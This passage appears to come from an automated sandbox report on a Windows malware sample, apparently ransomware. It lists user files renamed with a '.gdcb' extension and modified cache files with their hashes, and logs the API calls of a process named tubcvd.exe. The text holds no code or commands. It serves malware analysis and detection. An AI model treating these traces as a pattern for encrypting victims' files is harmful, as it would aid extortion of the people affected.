SHA1: b7eed85264fdf1feb5f88b0c74dc4637335dab06
SHA256: 6a77d018608e327a4de7feb6be95f86d425fee95886e7cf4ab2ac43d767b2de8 		False
c:\documents and settings\ciihmnxmn6ps\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\temp\xfno_bfgg.m4a.gdcb 85.14 KB (87184 bytes) MD5: ab7753a2c7578bdda32ebe81902fdb7a
SHA1: 594698ee95d2d737336ea2ec571049f75d163c55
SHA256: bc5d1e1b976cd2a1217804ba076ae83cd02a54139ec8515513017b12263ac1dc 		False
c:\documents and settings\ciihmnxmn6ps\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\clr_v2.0\usagelogs\winproj.exe.log.gdcb 0.55 KB (560 bytes) MD5: 2e07a28f72b02f5cc0bc1645a2b2e888
SHA1: dff08188de9ece1376a7a974be5c1a24c7476b25
SHA256: dae0a8c3ad7f3d29ae49045651ddb302cc4148e6a94acaa742758f71f192188e 		False
c:\documents and settings\ciihmnxmn6ps\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\windows\explorer\iconcache_1280.db.gdcb 0.55 KB (560 bytes) MD5: be73837552d722a0b966186512851a2d
SHA1: 8260ff0bbe441a553c9321c33f48cde5b249776c
SHA256: 96890b8cd391992c8c2fab7677e1f1d249c61e03657419f16ab427d33587ada3 		False
c:\documents and settings\ciihmnxmn6ps\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\windows\explorer\iconcache_1920.db.gdcb 0.55 KB (560 bytes) MD5: 02b73d4b4ef21ab859651f7abcaf34a4
SHA1: 1ef5feec863c57d84a42c49da3374985bd1c87e1
SHA256: 7685c55a93a23bd552e035f7033b71561bef49fa54ac73738ab23ae660abca49 		False
c:\documents and settings\ciihmnxmn6ps\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\windows\explorer\iconcache_2560.db.gdcb 0.55 KB (560 bytes) MD5: 84524a35d21c292988e364bdc903218b
SHA1: 75a527cde5716693d77558649190c5ef15e2d049
SHA256: 8a3b949396aa32857c0134f79649118751a45735f9edf794e2c341b1ecc85529 		False
c:\documents and settings\ciihmnxmn6ps\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\windows\explorer\iconcache_768.db.gdcb 0.55 KB (560 bytes) MD5: 8564beeedec4a7a56e0dc72d2919ce1f
SHA1: 59a0da56530f5e36cce0846e49e46b05177b9d54
SHA256: a18ffb4edc3e53e4f714e449c27dfe68f0bcbe989a21f2cb45b676c7229189d7 		False
c:\documents and settings\ciihmnxmn6ps\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\windows\explorer\iconcache_96.db.gdcb 0.55 KB (560 bytes) MD5: 59ab91efdfaff60ceca489faee8c397e
SHA1: 013c3400ebe04018a8ba05bf96f85a8513926ece
SHA256: 83d982668329811a4eb6d620b3baa1b5b8cd05e33b9a14da43f197d9c16eb490 		False
c:\documents and settings\ciihmnxmn6ps\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\windows\explorer\iconcache_exif.db.gdcb 0.55 KB (560 bytes) MD5: 0a68d4faf0383e77e3f22d60e2d98fd7
SHA1: 03c52f304dd7b54c7d5a69e2a574811fb5d51193
SHA256: f683e7c200fc56d71e4f996c6a6564fe583eaa70fbed4f54981eb7b649e1d4a3 		False
c:\documents and settings\ciihmnxmn6ps\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\windows\explorer\iconcache_sr.db.gdcb 0.55 KB (560 bytes) MD5: fada87e3fea81eede92bfea8606fd61f
SHA1: aa909dd16c8dbec90e5cce2960727e66b3a936ce
SHA256: efe09c26fd50dd628d3d2a468779d802096219db65b9c692ec6717e645308127 		False
c:\documents and settings\ciihmnxmn6ps\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\windows\explorer\iconcache_wide.db.gdcb 0.55 KB (560 bytes) MD5: 53a9bfbb45b90e2a41103c35c8658d1d
SHA1: 5eb9cb1ac9c97a5de583add0e660682ff33c43d4
SHA256: 5ee2f440471473e0075dddc7b952e931ecfcd72a404134991a7cd8398180a6b9 		False
c:\documents and settings\ciihmnxmn6ps\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\internet explorer\domstore\52uk17nv\www.google[1].xml.gdcb 0.53 KB (544 bytes) MD5: ec0dac0e26f04c20545c25465723c368
SHA1: fd944a47725230f0b569abb774f7dbb3371727c4
SHA256: e399b1ec24ed664e4d67e308a614da031f95ea57df5368ef0daf7cd87f17c9d1 		False
c:\documents and settings\ciihmnxmn6ps\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\windows\explorer\iconcache_256.db.gdcb 0.55 KB (560 bytes) MD5: 51947ffd5514e151ddcaa4f68e27a8b1
SHA1: 774b27c8b0864d4a6a804549b687cb9455fffa08
SHA256: e2ae56bfad2ec2fe500c76aeb1f57f11ec16195cd804581b206aca43c2be7e0c 		False
c:\documents and settings\ciihmnxmn6ps\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\windows\explorer\iconcache_custom_stream.db.gdcb 0.55 KB (560 bytes) MD5: 5550f3a3faf77ba31ff8cb8aa2452af4
SHA1: 98399736baba2f252b5b2dfe0c9b6a177b60eb70
SHA256: 25474e6719393a8b65e67085ec53d770d77ecc68cf91fa2581242eb8d92531e0 		False
c:\documents and settings\ciihmnxmn6ps\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\windows\explorer\iconcache_wide_alternate.db.gdcb 0.55 KB (560 bytes) MD5: 04737579390b94fe984d9c857157954d
SHA1: ea9ed7dc6463a6a9f49a7b1fde156b5c29d9aa9b
SHA256: 0a1f0b89b51aa6466891a75d4b708651f9dc18699c2b57806f6d9a010ca1dcd0 		False
c:\documents and settings\ciihmnxmn6ps\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\windows\explorer\thumbcache_1280.db.gdcb 0.55 KB (560 bytes) MD5: 27c6858a69cc97bef33ff974c25725f3
SHA1: 1746e7db5ec2152d99dff29363e005852ac18116
SHA256: 60b8b1f171c03bc176c139164d833acc178c85b7b88cb604373f489211e416da 		False
c:\documents and settings\ciihmnxmn6ps\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\windows\explorer\thumbcache_16.db.gdcb 0.55 KB (560 bytes) MD5: 1b24296c9646ae4016bd39cfc929be01
SHA1: 1375a7fba96d68184a55c27557c2160cdf45bfec
SHA256: 2fa73997efa0fe647cd36d5a9e9155ee8b61836bc720f1d127b6ab0adca807ab 		False
c:\documents and settings\ciihmnxmn6ps\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\windows\explorer\thumbcache_1920.db.gdcb 0.55 KB (560 bytes) MD5: 31af4e840b0a8282c753cf861eace6f2
SHA1: 127fc146d12a0a941733074ff17cc11acd85d57f
SHA256: da417ac9b52d08c29a13d8653b468ca090bc445287519a9d75ad3bb4c7cd704a 		False
c:\documents and settings\ciihmnxmn6ps\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\windows\explorer\thumbcache_2560.db.gdcb 0.55 KB (560 bytes) MD5: 43a53c7ec10033300ac4dd6225d461dd
SHA1: aa81e45004a30685536ce97b81ed8eae129a6824
SHA256: 9478cb573628c7389b4dfa7ec33661fda7e142437beeafd22ccf0128fa06134a 		False
c:\documents and settings\ciihmnxmn6ps\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\windows\explorer\thumbcache_768.db.gdcb 0.55 KB (560 bytes) MD5: 600b1818a6d34480d33eea000c277a31
SHA1: a8743e3dfd5c3262509d3ae3856464d6f692f3fe
SHA256: a735b431c6ec13c900b4d4228380c0e3170d6674f535ce2618af5ec5af29ba39 		False
c:\documents and settings\ciihmnxmn6ps\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\windows\explorer\thumbcache_96.db.gdcb 0.55 KB (560 bytes) MD5: 407bc8cee99932182ab3c65f649e911b
SHA1: 9314f15f45b9836e66e95c428ad2c17b844df24d
SHA256: 3e11a32d4553052a05f275d0177301c9ef3dcd50f81061baeb72ab69a508d454 		False
c:\documents and settings\ciihmnxmn6ps\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\windows\explorer\thumbcache_custom_stream.db.gdcb 0.55 KB (560 bytes) MD5: 3bf9c336a0b4e1c08b6ef5d1c034e92e
SHA1: 6324e7e2fab26c44948155c957bcc8f14832e627
SHA256: eaa66b36e828fcb060da292973b131d1587838ac907bd8379c77930b569753d0 		False
c:\documents and settings\ciihmnxmn6ps\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\windows\explorer\thumbcache_exif.db.gdcb 0.55 KB (560 bytes) MD5: 4112f9db59c9acfc9e186b3e82efb6c6
SHA1: ff41569ac29d2c673a37689a9a39ef628bfc4351
SHA256: 8c4469c907a7e1d75d3ff2e98773e1d1bf5a9331b540134c8c5066bcbcdda0b0 		False
c:\documents and settings\ciihmnxmn6ps\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\windows\explorer\thumbcache_sr.db.gdcb 0.55 KB (560 bytes) MD5: 523e7d518b79763900f2f879fb01e5db
SHA1: 4cde6c7deeaecd552a9c2ccb3c1b04eb28b64b3c
SHA256: 6e2146344d81eac7e438e3a79c3e8d892e81816b64cc2ba095e09a67bfdeb571 		False
c:\documents and settings\ciihmnxmn6ps\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\windows\explorer\thumbcache_wide.db.gdcb 0.55 KB (560 bytes) MD5: 949084f7925607a890f972e517df979a
SHA1: 7d3c8ac2a9f453dde15c9c34518c21968e16e71c
SHA256: 5cd60768718bc04e544a1417dfd2f493748e177fc07050be0d83a1e645e4c856 		False
c:\documents and settings\ciihmnxmn6ps\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\windows\explorer\thumbcache_wide_alternate.db.gdcb 0.55 KB (560 bytes) MD5: 60c61a888f0573147219df1fda475503
SHA1: 4fc116ae89c7ce8776384ce3b787f0738f5f336a
SHA256: 7ec88ab19d21863ad0879619651e617ca84d69095d73c69f401e5d9fdc44d29e 		False
c:\documents and settings\ciihmnxmn6ps\appdata\local\application data\application data\application data\application data\application data\application data\application data\microsoft\internet explorer\domstore\l8oqst1l\consent.google[1].xml.gdcb 0.53 KB (544 bytes) MD5: f0ba071403c582a7ef9044a4343a8742
SHA1: 11d901255b1978b0f98134993f27ef173e2ee227
SHA256: c6ce6391a34e4c364caaccf95bc3a233d723caa4826842ca74e003067f7dda99 		False
c:\documents and settings\ciihmnxmn6ps\appdata\locallow\microsoft\internet explorer\domstore\jukmmx7p\secure-ds.serving-sys[1].xml.gdcb 0.53 KB (544 bytes) MD5: 0631f71880943dfcf057e87692abf03c
SHA1: f570ef64409adbbe5d809ebfce0728234f56d4ac
SHA256: 1c4a6dcd818db4b9a1d8b1f159aff7eea5746a91a98b0362aca4f6def28482bb 		False
c:\documents and settings\ciihmnxmn6ps\appdata\roaming\microsoft\windows\themes\cachedfiles\cachedimage_1440_900_pos4.jpg.gdcb 73.88 KB (75648 bytes) MD5: 340d913d43779ca4eca5063e73d6385e
SHA1: bf9eb984a0f2e916aa8a30e0489deab28c5209d8
SHA256: 0563766b6648a1bf9149b1144b2f65408dfdea38926379fdd4dd33d853ca3162 		False
Modified Files
+
Filename File Size Hash Values YARA Match Actions
c:\users\ciihmnxmn6ps\appdata\local\adobe\acrobat\dc\iconcacherdr.dat 52.84 KB (54112 bytes) MD5: 0fc7061e0eb376d2b0acbad381f47fdf
SHA1: fb052b9a5ef4e1615a710bb53f752d37a9419764
SHA256: 406a7bf9b71455f12d35992195d5c07118d73d8859806a5a3e104ded75758464 		False
c:\users\ciihmnxmn6ps\appdata\local\adobe\acrobat\dc\iconcacherdr65536.dat 180.28 KB (184608 bytes) MD5: 132bbc930f049894ccea5871ffe84ab8
SHA1: 0a0ddf8b74c5d38f9587157dca9fb33e6750f030
SHA256: 8364e5a9e4410c14a887d43e44d51c1aea63ec5ad44c2c97a718e9ba8580e840 		False
c:\users\ciihmnxmn6ps\appdata\local\adobe\acrobat\dc\usercache.bin 62.45 KB (63952 bytes) MD5: bf882920036a75cb92c792306f46e5ec
SHA1: 3375b3ff827228a9f97ee756c354cdfc384886bb
SHA256: 8ab70fe4905f49f8d0d84d2baf791e58cdaa3f63ececf6f63fb5526aeedc32ed 		False
c:\users\ciihmnxmn6ps\appdata\local\temp\adobearm.log 1.20 KB (1232 bytes) MD5: 5d38e9224946a9e3c203e6c37f5331f7
SHA1: 7ee6a0f0270db05edbf912974c4cfa666d8a9557
SHA256: 6b9dc2d85598d87b21466a4837eac9b31ab7a9478d541dfa307a8a6be8d864a4 		False
c:\users\ciihmnxmn6ps\appdata\local\temp\armui.ini 251.91 KB (257952 bytes) MD5: 3bf4de62d5ecc6299d86cb914df154e4
SHA1: 145d9ca3e2032073ddc3f0a297b10d479025da11
SHA256: eb77ff5b42593075218ff67884a0ada3260a482cf7bb4d8ca1b6393ab5971516 		False
c:\users\ciihmnxmn6ps\appdata\local\temp\fy0zs5d.rtf 33.83 KB (34640 bytes) MD5: b4376a13dc0ef32795c0cd127aa9ba58
SHA1: bed8ed9bb9da598d3764ac44908d0538dca75db6
SHA256: 7a76fa1378067d4ad893ea72f9fa8fcec388006bd76a89dd139bfbab9ea982b5 		False
c:\users\ciihmnxmn6ps\appdata\local\temp\l0cggz.mkv 5.31 KB (5440 bytes) MD5: 44d69685bfe799614b7ce1309bec6c58
SHA1: 2be215eba0ccc3b11c75e4b79b223c5d1f1222e1
SHA256: 4d2d6b0642655be638e53d79303045ca1e067dfc496a38484006452ea244cd3e 		False
c:\users\ciihmnxmn6ps\appdata\local\temp\peyv.bmp 60.72 KB (62176 bytes) MD5: 5e0ad431fc81650f8e806c3a7850912d
SHA1: 41ad042c6e4d239dc3ab5d1e1afedc4d8003e718
SHA256: ee7a9547438b54a799ab81473bcc68618a885979f73f1b7b90168dfd0ca288a9 		False
c:\users\ciihmnxmn6ps\appdata\local\temp\psxl 1.gif 12.66 KB (12960 bytes) MD5: 80d66f640e05a25a0b42763de8a43b32
SHA1: 04d3b9898eb212585493f55f5158f7a165a24f84
SHA256: 8d31229fcec80febf56ba63c94b5fa6ee05465866bdc348171962b14c2ad1eeb 		False
c:\users\ciihmnxmn6ps\appdata\local\temp\u 7qtcnd.flv 64.47 KB (66016 bytes) MD5: 32ae09b304230ed8e10ad94d3399eea0
SHA1: d07bcacc187c6db6ecfd29eb2c40a29b07cfe11d
SHA256: da2c885143c02b2ab082607addc717d412f4c0a71ad95f0bda8f104a0db46e51 		False
c:\users\ciihmnxmn6ps\appdata\local\temp\uwup52bz.gif 30.61 KB (31344 bytes) MD5: 06c0738b8172a64561722a3286234cc8
SHA1: b7eed85264fdf1feb5f88b0c74dc4637335dab06
SHA256: 6a77d018608e327a4de7feb6be95f86d425fee95886e7cf4ab2ac43d767b2de8 		False
c:\users\ciihmnxmn6ps\appdata\local\temp\xfno_bfgg.m4a 85.14 KB (87184 bytes) MD5: ab7753a2c7578bdda32ebe81902fdb7a
SHA1: 594698ee95d2d737336ea2ec571049f75d163c55
SHA256: bc5d1e1b976cd2a1217804ba076ae83cd02a54139ec8515513017b12263ac1dc 		False
c:\users\ciihmnxmn6ps\appdata\local\comms\temp\calendarcache.dat 0.55 KB (560 bytes) MD5: b4984e476fc4c3f7a877a610e51e45ad
SHA1: 1039877f8c3232b1c992096d5126b634f2c2616c
SHA256: 15f2c4dd846a56bacdd0cdcae19df41307ccfd697e24a68c04b21f5e1c5e902b 		False
c:\users\ciihmnxmn6ps\appdata\local\microsoft\clr_v2.0\usagelogs\winproj.exe.log 0.55 KB (560 bytes) MD5: 2e07a28f72b02f5cc0bc1645a2b2e888
SHA1: dff08188de9ece1376a7a974be5c1a24c7476b25
SHA256: dae0a8c3ad7f3d29ae49045651ddb302cc4148e6a94acaa742758f71f192188e 		False
c:\users\ciihmnxmn6ps\appdata\local\microsoft\windows\explorer\iconcache_1280.db 0.55 KB (560 bytes) MD5: be73837552d722a0b966186512851a2d
SHA1: 8260ff0bbe441a553c9321c33f48cde5b249776c
SHA256: 96890b8cd391992c8c2fab7677e1f1d249c61e03657419f16ab427d33587ada3 		False
c:\users\ciihmnxmn6ps\appdata\local\microsoft\windows\explorer\iconcache_1920.db 0.55 KB (560 bytes) MD5: 02b73d4b4ef21ab859651f7abcaf34a4
SHA1: 1ef5feec863c57d84a42c49da3374985bd1c87e1
SHA256: 7685c55a93a23bd552e035f7033b71561bef49fa54ac73738ab23ae660abca49 		False
c:\users\ciihmnxmn6ps\appdata\local\microsoft\windows\explorer\iconcache_2560.db 0.55 KB (560 bytes) MD5: 84524a35d21c292988e364bdc903218b
SHA1: 75a527cde5716693d77558649190c5ef15e2d049
SHA256: 8a3b949396aa32857c0134f79649118751a45735f9edf794e2c341b1ecc85529 		False
c:\users\ciihmnxmn6ps\appdata\local\microsoft\windows\explorer\iconcache_768.db 0.55 KB (560 bytes) MD5: 8564beeedec4a7a56e0dc72d2919ce1f
SHA1: 59a0da56530f5e36cce0846e49e46b05177b9d54
SHA256: a18ffb4edc3e53e4f714e449c27dfe68f0bcbe989a21f2cb45b676c7229189d7 		False
c:\users\ciihmnxmn6ps\appdata\local\microsoft\windows\explorer\iconcache_96.db 0.55 KB (560 bytes) MD5: 59ab91efdfaff60ceca489faee8c397e
SHA1: 013c3400ebe04018a8ba05bf96f85a8513926ece
SHA256: 83d982668329811a4eb6d620b3baa1b5b8cd05e33b9a14da43f197d9c16eb490 		False
c:\users\ciihmnxmn6ps\appdata\local\microsoft\windows\explorer\iconcache_custom_stream.db 0.55 KB (560 bytes) MD5: 5550f3a3faf77ba31ff8cb8aa2452af4
SHA1: 98399736baba2f252b5b2dfe0c9b6a177b60eb70
SHA256: 25474e6719393a8b65e67085ec53d770d77ecc68cf91fa2581242eb8d92531e0 		False
c:\users\ciihmnxmn6ps\appdata\local\microsoft\windows\explorer\iconcache_exif.db 0.55 KB (560 bytes) MD5: 0a68d4faf0383e77e3f22d60e2d98fd7
SHA1: 03c52f304dd7b54c7d5a69e2a574811fb5d51193
SHA256: f683e7c200fc56d71e4f996c6a6564fe583eaa70fbed4f54981eb7b649e1d4a3 		False
c:\users\ciihmnxmn6ps\appdata\local\microsoft\windows\explorer\iconcache_sr.db 0.55 KB (560 bytes) MD5: fada87e3fea81eede92bfea8606fd61f
SHA1: aa909dd16c8dbec90e5cce2960727e66b3a936ce
SHA256: efe09c26fd50dd628d3d2a468779d802096219db65b9c692ec6717e645308127 		False
c:\users\ciihmnxmn6ps\appdata\local\microsoft\windows\explorer\iconcache_wide.db 0.55 KB (560 bytes) MD5: 53a9bfbb45b90e2a41103c35c8658d1d
SHA1: 5eb9cb1ac9c97a5de583add0e660682ff33c43d4
SHA256: 5ee2f440471473e0075dddc7b952e931ecfcd72a404134991a7cd8398180a6b9 		False
c:\users\ciihmnxmn6ps\appdata\local\microsoft\internet explorer\domstore\52uk17nv\www.google[1].xml 0.53 KB (544 bytes) MD5: ec0dac0e26f04c20545c25465723c368
SHA1: fd944a47725230f0b569abb774f7dbb3371727c4
SHA256: e399b1ec24ed664e4d67e308a614da031f95ea57df5368ef0daf7cd87f17c9d1 		False
c:\users\ciihmnxmn6ps\appdata\local\microsoft\internet explorer\domstore\l8oqst1l\consent.google[1].xml 0.53 KB (544 bytes) MD5: f0ba071403c582a7ef9044a4343a8742
SHA1: 11d901255b1978b0f98134993f27ef173e2ee227
SHA256: c6ce6391a34e4c364caaccf95bc3a233d723caa4826842ca74e003067f7dda99 		False
c:\users\ciihmnxmn6ps\appdata\local\microsoft\windows\explorer\iconcache_256.db 0.55 KB (560 bytes) MD5: 51947ffd5514e151ddcaa4f68e27a8b1
SHA1: 774b27c8b0864d4a6a804549b687cb9455fffa08
SHA256: e2ae56bfad2ec2fe500c76aeb1f57f11ec16195cd804581b206aca43c2be7e0c 		False
c:\users\ciihmnxmn6ps\appdata\local\microsoft\windows\explorer\iconcache_wide_alternate.db 0.55 KB (560 bytes) MD5: 04737579390b94fe984d9c857157954d
SHA1: ea9ed7dc6463a6a9f49a7b1fde156b5c29d9aa9b
SHA256: 0a1f0b89b51aa6466891a75d4b708651f9dc18699c2b57806f6d9a010ca1dcd0 		False
c:\users\ciihmnxmn6ps\appdata\local\microsoft\windows\explorer\thumbcache_1280.db 0.55 KB (560 bytes) MD5: 27c6858a69cc97bef33ff974c25725f3
SHA1: 1746e7db5ec2152d99dff29363e005852ac18116
SHA256: 60b8b1f171c03bc176c139164d833acc178c85b7b88cb604373f489211e416da 		False
c:\users\ciihmnxmn6ps\appdata\local\microsoft\windows\explorer\thumbcache_16.db 0.55 KB (560 bytes) MD5: 1b24296c9646ae4016bd39cfc929be01
SHA1: 1375a7fba96d68184a55c27557c2160cdf45bfec
SHA256: 2fa73997efa0fe647cd36d5a9e9155ee8b61836bc720f1d127b6ab0adca807ab 		False
c:\users\ciihmnxmn6ps\appdata\local\microsoft\windows\explorer\thumbcache_1920.db 0.55 KB (560 bytes) MD5: 31af4e840b0a8282c753cf861eace6f2
SHA1: 127fc146d12a0a941733074ff17cc11acd85d57f
SHA256: da417ac9b52d08c29a13d8653b468ca090bc445287519a9d75ad3bb4c7cd704a 		False
c:\users\ciihmnxmn6ps\appdata\local\microsoft\windows\explorer\thumbcache_2560.db 0.55 KB (560 bytes) MD5: 43a53c7ec10033300ac4dd6225d461dd
SHA1: aa81e45004a30685536ce97b81ed8eae129a6824
SHA256: 9478cb573628c7389b4dfa7ec33661fda7e142437beeafd22ccf0128fa06134a 		False
c:\users\ciihmnxmn6ps\appdata\local\microsoft\windows\explorer\thumbcache_768.db 0.55 KB (560 bytes) MD5: 600b1818a6d34480d33eea000c277a31
SHA1: a8743e3dfd5c3262509d3ae3856464d6f692f3fe
SHA256: a735b431c6ec13c900b4d4228380c0e3170d6674f535ce2618af5ec5af29ba39 		False
c:\users\ciihmnxmn6ps\appdata\local\microsoft\windows\explorer\thumbcache_96.db 0.55 KB (560 bytes) MD5: 407bc8cee99932182ab3c65f649e911b
SHA1: 9314f15f45b9836e66e95c428ad2c17b844df24d
SHA256: 3e11a32d4553052a05f275d0177301c9ef3dcd50f81061baeb72ab69a508d454 		False
c:\users\ciihmnxmn6ps\appdata\local\microsoft\windows\explorer\thumbcache_custom_stream.db 0.55 KB (560 bytes) MD5: 3bf9c336a0b4e1c08b6ef5d1c034e92e
SHA1: 6324e7e2fab26c44948155c957bcc8f14832e627
SHA256: eaa66b36e828fcb060da292973b131d1587838ac907bd8379c77930b569753d0 		False
c:\users\ciihmnxmn6ps\appdata\local\microsoft\windows\explorer\thumbcache_exif.db 0.55 KB (560 bytes) MD5: 4112f9db59c9acfc9e186b3e82efb6c6
SHA1: ff41569ac29d2c673a37689a9a39ef628bfc4351
SHA256: 8c4469c907a7e1d75d3ff2e98773e1d1bf5a9331b540134c8c5066bcbcdda0b0 		False
c:\users\ciihmnxmn6ps\appdata\local\microsoft\windows\explorer\thumbcache_sr.db 0.55 KB (560 bytes) MD5: 523e7d518b79763900f2f879fb01e5db
SHA1: 4cde6c7deeaecd552a9c2ccb3c1b04eb28b64b3c
SHA256: 6e2146344d81eac7e438e3a79c3e8d892e81816b64cc2ba095e09a67bfdeb571 		False
c:\users\ciihmnxmn6ps\appdata\local\microsoft\windows\explorer\thumbcache_wide.db 0.55 KB (560 bytes) MD5: 949084f7925607a890f972e517df979a
SHA1: 7d3c8ac2a9f453dde15c9c34518c21968e16e71c
SHA256: 5cd60768718bc04e544a1417dfd2f493748e177fc07050be0d83a1e645e4c856 		False
c:\users\ciihmnxmn6ps\appdata\local\microsoft\windows\explorer\thumbcache_wide_alternate.db 0.55 KB (560 bytes) MD5: 60c61a888f0573147219df1fda475503
SHA1: 4fc116ae89c7ce8776384ce3b787f0738f5f336a
SHA256: 7ec88ab19d21863ad0879619651e617ca84d69095d73c69f401e5d9fdc44d29e 		False
c:\users\ciihmnxmn6ps\appdata\locallow\microsoft\internet explorer\domstore\jukmmx7p\secure-ds.serving-sys[1].xml 0.53 KB (544 bytes) MD5: 0631f71880943dfcf057e87692abf03c
SHA1: f570ef64409adbbe5d809ebfce0728234f56d4ac
SHA256: 1c4a6dcd818db4b9a1d8b1f159aff7eea5746a91a98b0362aca4f6def28482bb 		False
Threads
Thread 0x89c
(Host: 718, Network: 33)
+
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-01-26 06:54:15 (UTC) True 1
Fn
System Get Time type = Ticks, time = 83468 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x74780000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x7479a330 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x74797580 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x74799910 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x7479f400 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x74780000 True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename process_name = c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\tubcvd.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\tubcvd.exe, size = 260 True 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
